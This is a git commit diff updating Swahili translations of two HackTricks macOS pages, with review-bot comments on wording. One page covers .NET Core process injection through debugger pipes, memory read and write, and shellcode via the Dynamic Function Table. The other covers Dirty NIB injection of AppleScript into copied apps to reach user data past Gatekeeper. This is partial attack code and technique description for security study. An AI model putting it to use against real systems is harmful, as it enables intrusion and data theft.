Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

This commit is contained in:
Translator 2024-07-19 05:19:21 +00:00
parent ba67eb8b15
commit 15259f8260
82 changed files with 3242 additions and 4347 deletions

View file

@ -1,30 +1,31 @@
# Uingizaji wa Programu za .Net kwenye macOS
# macOS .Net Applications Injection
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
**Hii ni muhtasari wa chapisho [https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/](https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/). Angalia kwa maelezo zaidi!**
## Udukuzi wa .NET Core <a href="#net-core-debugging" id="net-core-debugging"></a>
## .NET Core Debugging <a href="#net-core-debugging" id="net-core-debugging"></a>
### **Kuanzisha Kikao cha Udukuzi** <a href="#net-core-debugging" id="net-core-debugging"></a>
### **Kuweka Kikao cha Ufuatiliaji** <a href="#net-core-debugging" id="net-core-debugging"></a>
Usimamizi wa mawasiliano kati ya kudukuzi na programu inayodukuliwa katika .NET unadhibitiwa na [**dbgtransportsession.cpp**](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp). Sehemu hii inaweka mabomba mawili yaliyopewa jina kwa kila mchakato wa .NET kama ilivyoonekana katika [dbgtransportsession.cpp#L127](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp#L127), ambayo huanzishwa kupitia [twowaypipe.cpp#L27](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/debug-pal/unix/twowaypipe.cpp#L27). Mabomba haya yanamaliziwa na **`-in`** na **`-out`**.
Usimamizi wa mawasiliano kati ya debugger na debuggee katika .NET unashughulikiwa na [**dbgtransportsession.cpp**](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp). Kipengele hiki kinaanzisha bomba mbili zenye majina kwa kila mchakato wa .NET kama inavyoonekana katika [dbgtransportsession.cpp#L127](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp#L127), ambazo zinaanzishwa kupitia [twowaypipe.cpp#L27](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/debug-pal/unix/twowaypipe.cpp#L27). Mabomba haya yanaishia na **`-in`** na **`-out`**.
Kwa kutembelea **`$TMPDIR`** ya mtumiaji, mtu anaweza kupata mabomba ya udukuzi yanayopatikana kwa ajili ya programu za .Net.
Kwa kutembelea **`$TMPDIR`** ya mtumiaji, mtu anaweza kupata FIFOs za ufuatiliaji zinazopatikana kwa ajili ya ufuatiliaji wa programu za .Net.
[**DbgTransportSession::TransportWorker**](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp#L1259) inahusika na usimamizi wa mawasiliano kutoka kwa kudukuzi. Ili kuanzisha kikao kipya cha udukuzi, kudukuzi lazima atume ujumbe kupitia mabomba ya `out` ukiwa na muundo wa `MessageHeader` struct, ulioelezewa kwa undani katika msimbo wa chanzo wa .NET:
[**DbgTransportSession::TransportWorker**](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp#L1259) inawajibika kwa usimamizi wa mawasiliano kutoka kwa debugger. Ili kuanzisha kikao kipya cha ufuatiliaji, debugger lazima itume ujumbe kupitia bomba la `out` linaloanza na muundo wa `MessageHeader`, ulioelezwa katika msimbo wa chanzo wa .NET:
```c
struct MessageHeader {
MessageType m_eType; // Message type
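Review bot: the translated headings are replaced by English ones in this hunk: `# Uingizaji wa Programu za .Net kwenye macOS` becomes `# macOS .Net Applications Injection` and `## Udukuzi wa .NET Core` becomes `## .NET Core Debugging`, while the sub-heading `### **Kuweka Kikao cha Ufuatiliaji**` and the body stay in Swahili, so the file now mixes languages at the heading level. Either keep the Swahili headings (the `id="net-core-debugging"` anchors do not depend on the heading text, so existing links keep working) or translate all three consistently. The terminology change in the body is an improvement and should stay: the removed text rendered "debugger" as "kudukuzi" and "debugging" as "udukuzi", which mean hacker/hacking, whereas the new "debugger" / "ufuatiliaji" and "FIFOs za ufuatiliaji" no longer conflate debugging with hacking. The `<summary>Support HackTricks</summary>` line and the "Learn & practice AWS Hacking" banner are also left in English; if that is intentional for the shared template, fine, but it should be the same decision in every translated file.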
@ -43,7 +44,7 @@ DWORD m_dwMinorVersion;
BYTE m_sMustBeZero[8];
}
```
Kuomba kikao kipya, muundo huu unajazwa kama ifuatavyo, ukiweka aina ya ujumbe kuwa `MT_SessionRequest` na toleo la itifaki kuwa toleo la sasa:
Ili kuomba kikao kipya, muundo huu unajazwa kama ifuatavyo, ukipanga aina ya ujumbe kuwa `MT_SessionRequest` na toleo la protokali kuwa toleo la sasa:
```c
static const DWORD kCurrentMajorVersion = 2;
static const DWORD kCurrentMinorVersion = 0;
@ -54,18 +55,18 @@ sSendHeader.TypeSpecificData.VersionInfo.m_dwMajorVersion = kCurrentMajorVersion
sSendHeader.TypeSpecificData.VersionInfo.m_dwMinorVersion = kCurrentMinorVersion;
sSendHeader.m_cbDataBlock = sizeof(SessionRequestData);
```
Kichwa hiki kisha kinatumwa kwa lengo kwa kutumia `write` syscall, ikifuatiwa na `sessionRequestData` struct inayojumuisha GUID kwa kikao:
Hii kichwa kisha kinatumwa kwa lengo kwa kutumia syscall ya `write`, ikifuatwa na muundo wa `sessionRequestData` unao zawadi ya GUID kwa ajili ya kikao:
```c
write(wr, &sSendHeader, sizeof(MessageHeader));
memset(&sDataBlock.m_sSessionID, 9, sizeof(SessionRequestData));
write(wr, &sDataBlock, sizeof(SessionRequestData));
```
Operesheni ya kusoma kwenye bomba la `out` inathibitisha mafanikio au kushindwa kwa kuanzisha kikao cha kurekebisha makosa:
Operesheni ya kusoma kwenye bomba la `out` inathibitisha mafanikio au kushindwa kwa kuanzishwa kwa kikao cha ufuatiliaji:
```c
read(rd, &sReceiveHeader, sizeof(MessageHeader));
```
## Kusoma Kumbukumbu
Marudio ya kubugia yameanzishwa, kumbukumbu inaweza kusomwa kwa kutumia aina ya ujumbe [`MT_ReadMemory`](https://github.com/dotnet/runtime/blob/f3a45a91441cf938765bafc795cbf4885cad8800/src/coreclr/src/debug/shared/dbgtransportsession.cpp#L1896). Kazi ya kusoma kumbukumbu imefafanuliwa, ikitekeleza hatua zinazohitajika kutuma ombi la kusoma na kupata jibu.
Mara tu kikao cha ufuatiliaji kimeanzishwa, kumbukumbu inaweza kusomwa kwa kutumia [`MT_ReadMemory`](https://github.com/dotnet/runtime/blob/f3a45a91441cf938765bafc795cbf4885cad8800/src/coreclr/src/debug/shared/dbgtransportsession.cpp#L1896) aina ya ujumbe. Kazi readMemory inaelezewa kwa undani, ikifanya hatua zinazohitajika kutuma ombi la kusoma na kupata jibu:
```c
bool readMemory(void *addr, int len, unsigned char **output) {
// Allocation and initialization
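Review bot: the new sentence `Hii kichwa kisha kinatumwa kwa lengo ... muundo wa sessionRequestData unao zawadi ya GUID kwa ajili ya kikao` is a regression: "zawadi" means a gift or prize, so the sentence no longer says that the struct contains the session GUID, and "Hii kichwa" breaks noun-class agreement (the removed line had the correct "Kichwa hiki"). Suggest keeping the removed phrasing with the minor polish: `Kichwa hiki kisha kinatumwa kwa lengo kwa kutumia syscall ya write, ikifuatiwa na muundo wa sessionRequestData unaojumuisha GUID ya kikao`. The other changes in the hunk read well: `Mara tu kikao cha ufuatiliaji kimeanzishwa` replaces the garbled `Marudio ya kubugia yameanzishwa`, and naming `readMemory` in the sentence matches the function in the code that follows; only the word order `MT_ReadMemory aina ya ujumbe` is English-style and should be `aina ya ujumbe MT_ReadMemory`.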
@ -77,11 +78,11 @@ bool readMemory(void *addr, int len, unsigned char **output) {
return true;
}
```
Uthibitisho kamili wa dhana (POC) inapatikana [hapa](https://gist.github.com/xpn/95eefc14918998853f6e0ab48d9f7b0b).
The complete proof of concept (POC) is available [here](https://gist.github.com/xpn/95eefc14918998853f6e0ab48d9f7b0b).
## Kuandika Kumbukumbu
## Writing Memory
Vivyo hivyo, kumbukumbu inaweza kuandikwa kwa kutumia kazi ya `writeMemory`. Mchakato unahusisha kuweka aina ya ujumbe kuwa `MT_WriteMemory`, kisha kutoa anwani na urefu wa data, na hatimaye kutuma data:
Vivyo hivyo, kumbukumbu inaweza kuandikwa kwa kutumia kazi ya `writeMemory`. Mchakato unahusisha kuweka aina ya ujumbe kuwa `MT_WriteMemory`, kubainisha anwani na urefu wa data, na kisha kutuma data:
```c
bool writeMemory(void *addr, int len, unsigned char *input) {
// Increment IDs, set message type, and specify memory location
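Review bot: two Swahili lines are replaced by untranslated English here: `Uthibitisho kamili wa dhana (POC) inapatikana hapa` becomes `The complete proof of concept (POC) is available here`, and the heading `## Kuandika Kumbukumbu` becomes `## Writing Memory`. Both removed lines were correct translations, so this looks like the English source being copied over the translation rather than a deliberate choice; suggest restoring them. The `writeMemory` paragraph rewording (`kubainisha anwani na urefu wa data, na kisha kutuma data`) is fine and matches the three steps the function comment lists.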
@ -93,37 +94,38 @@ bool writeMemory(void *addr, int len, unsigned char *input) {
return true;
}
```
POC inapatikana [hapa](https://gist.github.com/xpn/7c3040a7398808747e158a25745380a5).
The associated POC is available [here](https://gist.github.com/xpn/7c3040a7398808747e158a25745380a5).
## .NET Core Utekelezaji wa Kanuni <a href="#net-core-code-execution" id="net-core-code-execution"></a>
## .NET Core Code Execution <a href="#net-core-code-execution" id="net-core-code-execution"></a>
Ili kutekeleza kanuni, mtu anahitaji kutambua eneo la kumbukumbu lenye ruhusa za rwx, ambalo linaweza kufanywa kwa kutumia vmmap -pages:
Ili kutekeleza msimbo, mtu anahitaji kubaini eneo la kumbukumbu lenye ruhusa za rwx, ambalo linaweza kufanywa kwa kutumia vmmap -pages:
```bash
vmmap -pages [pid]
vmmap -pages 35829 | grep "rwx/rwx"
```
Kupata mahali pa kubadilisha kidole cha kazi ni muhimu, na katika .NET Core, hii inaweza kufanywa kwa kulenga **Dynamic Function Table (DFT)**. Jedwali hili, lililoelezwa katika [`jithelpers.h`](https://github.com/dotnet/runtime/blob/6072e4d3a7a2a1493f514cdf4be75a3d56580e84/src/coreclr/src/inc/jithelpers.h), hutumiwa na runtime kwa kazi za msaada wa kompilisheni ya JIT.
Kuweka mahali pa kufuta kiashiria cha kazi ni muhimu, na katika .NET Core, hii inaweza kufanywa kwa kulenga **Dynamic Function Table (DFT)**. Meza hii, iliyoelezewa katika [`jithelpers.h`](https://github.com/dotnet/runtime/blob/6072e4d3a7a2a1493f514cdf4be75a3d56580e84/src/coreclr/src/inc/jithelpers.h), inatumika na mfumo wa uendeshaji kwa kazi za msaada wa JIT.
Kwa mifumo ya x64, unaweza kutumia utafutaji wa saini kupata marejeleo kwa ishara `_hlpDynamicFuncTable` katika `libcorclr.dll`.
Kwa mifumo ya x64, uwindaji wa saini unaweza kutumika kupata rejeleo kwa alama `_hlpDynamicFuncTable` katika `libcorclr.dll`.
Kazi ya kudebugi ya `MT_GetDCB` hutoa habari muhimu, ikiwa ni pamoja na anwani ya kazi ya msaada, `m_helperRemoteStartAddr`, inayoonyesha mahali pa `libcorclr.dll` katika kumbukumbu ya mchakato. Anwani hii kisha hutumiwa kuanza utafutaji wa DFT na kubadilisha kidole cha kazi na anwani ya shellcode.
Kazi ya ku-debug `MT_GetDCB` inatoa taarifa muhimu, ikiwa ni pamoja na anwani ya kazi ya msaada, `m_helperRemoteStartAddr`, ikionyesha mahali ambapo `libcorclr.dll` iko katika kumbukumbu ya mchakato. Anwani hii kisha inatumika kuanza kutafuta DFT na kufuta kiashiria cha kazi kwa anwani ya shellcode.
Msimbo kamili wa POC kwa kuingiza katika PowerShell unapatikana [hapa](https://gist.github.com/xpn/b427998c8b3924ab1d63c89d273734b6).
Msimu kamili wa POC wa sindano katika PowerShell unapatikana [hapa](https://gist.github.com/xpn/b427998c8b3924ab1d63c89d273734b6).
## Marejeo
## Marejeleo
* [https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/](https://blog.xpnsec.com/macos-injection-via-third-party-frameworks/)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
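Review bot: `Msimu kamili wa POC wa sindano katika PowerShell` contains a typo that changes the meaning: "msimu" is a season, the intended word is "msimbo" (code) as in the removed line, and "sindano" (a needle, injection in the medical sense) is a step back from the removed `kuingiza`. Two further regressions in the same hunk: `inatumika na mfumo wa uendeshaji kwa kazi za msaada wa JIT` renders "runtime" as "mfumo wa uendeshaji", which means operating system, whereas the removed line correctly kept "runtime" (the DFT belongs to the .NET runtime, not to macOS); and `kufuta kiashiria cha kazi` (in both the DFT paragraph and the `MT_GetDCB` paragraph) says to delete the function pointer where the text means overwriting it ("kuandika juu ya", or the removed "kubadilisha"). On the plus side, `msimbo` for "code" in `Ili kutekeleza msimbo` and `kiashiria` for "pointer" are better than the removed `kanuni` and `kidole` and should stay. As in the previous hunks, the Swahili heading `## .NET Core Utekelezaji wa Kanuni` and the `POC inapatikana hapa` sentence are replaced by English; keep them translated for consistency with the body.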

View file

@ -1,86 +1,88 @@
# macOS Dirty NIB
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
**Kwa maelezo zaidi kuhusu mbinu hii angalia chapisho la asili kutoka: [https://blog.xpnsec.com/dirtynib/**](https://blog.xpnsec.com/dirtynib/).** Hapa kuna muhtasari:
**Kwa maelezo zaidi kuhusu mbinu hii angalia chapisho asilia kutoka: [https://blog.xpnsec.com/dirtynib/**](https://blog.xpnsec.com/dirtynib/).** Hapa kuna muhtasari:
Faili za NIB, sehemu ya mfumo wa maendeleo wa Apple, zinatumika kwa kufafanua **vipengele vya UI** na mwingiliano wao katika programu. Zinaunda vitu vilivyosanidishwa kama madirisha na vitufe, na hulipwa wakati wa utekelezaji. Ingawa bado zinatumika, Apple sasa inapendekeza matumizi ya Storyboards kwa kuonyesha vizuri mtiririko wa UI.
Faili za NIB, sehemu ya mfumo wa maendeleo wa Apple, zinakusudia kufafanua **vipengele vya UI** na mwingiliano wao katika programu. Zinajumuisha vitu vilivyopangwa kama vile madirisha na vifungo, na hupakiwa wakati wa utendaji. Licha ya matumizi yao yaendelea, Apple sasa inapendekeza Storyboards kwa ajili ya uonyeshaji wa mtiririko wa UI wa kina zaidi.
### Wasiwasi wa Usalama na Faili za NIB
Ni muhimu kuzingatia kuwa **faili za NIB zinaweza kuwa hatari kwa usalama**. Zina uwezo wa **kutekeleza amri za kiholela**, na mabadiliko kwenye faili za NIB ndani ya programu hayazuizi Gatekeeper kutoka kutekeleza programu, hivyo kuwa tishio kubwa.
Ni muhimu kutambua kwamba **faili za NIB zinaweza kuwa hatari za usalama**. Zina uwezo wa **kutekeleza amri zisizo na mipaka**, na mabadiliko kwenye faili za NIB ndani ya programu hayazuia Gatekeeper kutekeleza programu hiyo, na kuleta tishio kubwa.
### Mchakato wa Uingizaji wa Dirty NIB
#### Kuunda na Kuweka Up Faili ya NIB
1. **Usanidi wa Awali**:
- Unda faili mpya ya NIB ukitumia XCode.
- Ongeza kitu kwenye kiolesura, ukiweka darasa lake kuwa `NSAppleScript`.
- Sanidi mali ya awali ya `source` kupitia Atributi za Wakati wa Utekelezaji Zilizofafanuliwa na Mtumiaji.
#### Kuunda na Kuweka Faili ya NIB
1. **Mipangilio ya Awali**:
- Unda faili mpya ya NIB kwa kutumia XCode.
- Ongeza Kitu kwenye kiolesura, ukipanga darasa lake kuwa `NSAppleScript`.
- Sanidi mali ya awali ya `source` kupitia Sifa za Wakati wa Uendeshaji Zilizofafanuliwa na Mtumiaji.
2. **Kifaa cha Utekelezaji wa Kanuni**:
- Usanidi huu unawezesha kukimbia AppleScript kwa ombi.
- Ingiza kitufe cha kuamsha kitu cha `Apple Script`, kwa kusababisha hasa chaguo la `executeAndReturnError:`.
2. **Kifaa cha Kutekeleza Msimbo**:
- Mipangilio hii inaruhusu kuendesha AppleScript kwa mahitaji.
- Jumuisha kifungo ili kuamsha kitu cha `Apple Script`, hasa kuanzisha mteule wa `executeAndReturnError:`.
3. **Jaribio**:
- Apple Script rahisi kwa ajili ya majaribio:
3. **Kujaribu**:
- Msimbo rahisi wa Apple Script kwa ajili ya majaribio:
```bash
set theDialogText to "PWND"
display dialog theDialogText
```
- Jaribu kwa kukimbia kwenye kichujio cha XCode na bonyeza kitufe.
- Jaribu kwa kuendesha kwenye debugger ya XCode na kubofya kifungo.
#### Kulenga Programu (Mfano: Pages)
1. **Maandalizi**:
- Nakili programu lengwa (k.m., Pages) kwenye saraka tofauti (k.m., `/tmp/`).
- Anzisha programu ili kuepuka matatizo ya Gatekeeper na kuihifadhi kwenye akiba.
- Nakili programu lengwa (mfano, Pages) kwenye saraka tofauti (mfano, `/tmp/`).
- Anzisha programu ili kuepuka matatizo ya Gatekeeper na kuikadiria.
2. **Kubadilisha Faili ya NIB**:
- Badilisha faili ya NIB iliyopo (k.m., About Panel NIB) na faili iliyoundwa ya DirtyNIB.
2. **Kufuta Faili ya NIB**:
- Badilisha faili ya NIB iliyopo (mfano, About Panel NIB) kwa faili ya DirtyNIB iliyoundwa.
3. **Utekelezaji**:
- Sababisha utekelezaji kwa kuingiliana na programu (k.m., kuchagua kipengee cha menyu ya `About`).
- Amsha utekelezaji kwa kuingiliana na programu (mfano, kuchagua kipengee cha menyu `About`).
#### Uthibitisho wa Dhana: Kupata Data ya Mtumiaji
- Badilisha AppleScript ili kupata na kuchambua data ya mtumiaji, kama picha, bila idhini ya mtumiaji.
#### Ushahidi wa Dhihirisho: Kupata Takwimu za Mtumiaji
- Badilisha AppleScript ili kufikia na kutoa takwimu za mtumiaji, kama picha, bila idhini ya mtumiaji.
### Mfano wa Kanuni: Faili ya .xib Iliyodhuru
- Pata na ukague [**mfano wa faili ya .xib iliyo dhahiri**](https://gist.github.com/xpn/16bfbe5a3f64fedfcc1822d0562636b4) ambayo inaonyesha utekelezaji wa nambari za kiholela.
### Mfano wa Msimbo: Faili ya .xib Mbaya
- Fikia na angalia [**mfano wa faili mbaya ya .xib**](https://gist.github.com/xpn/16bfbe5a3f64fedfcc1822d0562636b4) inayodhihirisha kutekeleza msimbo usio na mipaka.
### Kukabiliana na Vizuizi vya Kuzindua
- Vizuizi vya Kuzindua vinazuia utekelezaji wa programu kutoka maeneo yasiyotarajiwa (k.m., `/tmp`).
- Inawezekana kutambua programu ambazo hazilindwi na Vizuizi vya Kuzindua na kuzilenga kwa uingizaji wa faili za NIB.
### Kukabiliana na Vikwazo vya Uzinduzi
- Vikwazo vya Uzinduzi vinakwamisha utekelezaji wa programu kutoka maeneo yasiyotarajiwa (mfano, `/tmp`).
- Inawezekana kubaini programu ambazo hazijalindwa na Vikwazo vya Uzinduzi na kuzilenga kwa uingizaji wa faili za NIB.
### Kinga za Ziada za macOS
Kuanzia macOS Sonoma na kuendelea, marekebisho ndani ya vifurushi vya Programu yanazuiliwa. Walakini, njia za awali zilijumuisha:
1. Kunakili programu kwenye eneo tofauti (k.m., `/tmp/`).
2. Kubadilisha majina ya saraka ndani ya kifurushi cha programu ili kuepuka kinga za awali.
3. Baada ya kukimbia programu ili kujiandikisha na Gatekeeper, kubadilisha kifurushi cha programu (k.m., kubadilisha MainMenu.nib na Dirty.nib).
4. Kubadilisha majina ya saraka kurudi na kukimbia tena programu ili kutekeleza faili ya NIB iliyoingizwa.
### Ulinzi wa ziada wa macOS
Kuanzia macOS Sonoma, mabadiliko ndani ya vifurushi vya Programu yamezuiliwa. Hata hivyo, mbinu za awali zilihusisha:
1. Nakala ya programu kwenye eneo tofauti (mfano, `/tmp/`).
2. Kubadilisha majina ya saraka ndani ya kifurushi cha programu ili kupita ulinzi wa awali.
3. Baada ya kuendesha programu ili kujiandikisha na Gatekeeper, kubadilisha kifurushi cha programu (mfano, kubadilisha MainMenu.nib na Dirty.nib).
4. Kubadilisha majina ya saraka nyuma na kuendesha tena programu ili kutekeleza faili ya NIB iliyounganishwa.
**Kumbuka**: Sasisho za hivi karibuni za macOS zimezuia udanganyifu huu kwa kuzuia marekebisho ya faili ndani ya vifurushi vya programu baada ya akiba ya Gatekeeper, hivyo kufanya udanganyifu huu usifanikiwe.
**Kumbuka**: Sasisho za hivi karibuni za macOS zimepunguza exploit hii kwa kuzuia mabadiliko ya faili ndani ya vifurushi vya programu baada ya caching ya Gatekeeper, na kufanya exploit hiyo isifanye kazi.
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
